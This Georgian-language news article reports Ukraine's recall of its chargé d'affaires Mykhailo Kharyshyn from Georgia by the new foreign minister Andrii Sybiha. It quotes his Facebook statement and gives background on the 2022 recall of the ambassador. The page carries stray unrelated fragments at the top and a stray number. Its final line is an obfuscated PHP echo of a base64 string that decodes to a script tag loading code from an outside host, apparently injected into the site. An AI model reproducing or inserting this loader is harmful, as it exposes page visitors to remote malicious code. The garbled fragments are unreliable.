celsiusi
ავერსი შნაიდერი

უკრაინამ საქართველოდან დროებითი რწმუნებული მიხაილო ხარიშინი გაიწვია. შესაბამისი გადაწყვეტილება ქვეყნის საგარეო საქმეთა ახალმა მინისტრმა, ანდრეი სიბიგამ პირველი საკადრო გადაწყვეტილებების ფარგლებში მიიღო, რომლის შესახებაც Facebook-ის პირად გვერდზე დაწერა.

როგორც ის აღნიშნავს, ომში მყოფი ქვეყნის ელჩები ომის რეალობისგან მოწყვეტილი ვერ იქნებიან და ამასთან დაკავშირებით მიიღო გადაწყვეტილება საქართველოში უკრაინის დროებითი რწმუნებულის გაწვევის შესახებ.

"კარგად ვიცი რას ნიშნავს ელჩად მუშაობა და და როგორ გავხადო ეს სამუშაო უფრო ეფექტური. დღეს ყველა ელჩი უნდა იყოს მწვრთნელი, რომელიც არ ელოდება ცენტრიდან მითითებებს, არამედ მოქმედებს ინიციატივით, იღებს პასუხისმგებლობას და საკუთარი მაგალითით აჩვენებს უკრაინული დიპლომატიის ძალას. მხარს დავუჭერ საგარეო დიპლომატიური სამსახურის ყველა ხელმძღვანელს, რომელიც ასეთი ენერგეტიკისა და ეფექტურობის დემონსტრირებას ახდენს",- აღნიშნავს უკრაინის საგარეო საქმეთა მინისტრი, რომელიც თანამდებობაზე 5 სექტემბერს დაამტკიცეს.

შეგახსენებთ, უკრაინას 2022 წლიდან საქართველოში ელჩის ნაცვლად დროებითი რწმუნებული ჰყავს. უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ საქართველოდან უკრაინის ელჩის იგორ დოლგოვის გაწვევის გადაწყვეტილება 2022 წლის 1-ელ მარტს მიიღო, რის შემდეგაც საქართველოში უკრაინის დროებითი რწმუნებული ანდრეი კასიანოვი გახდა.

78
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");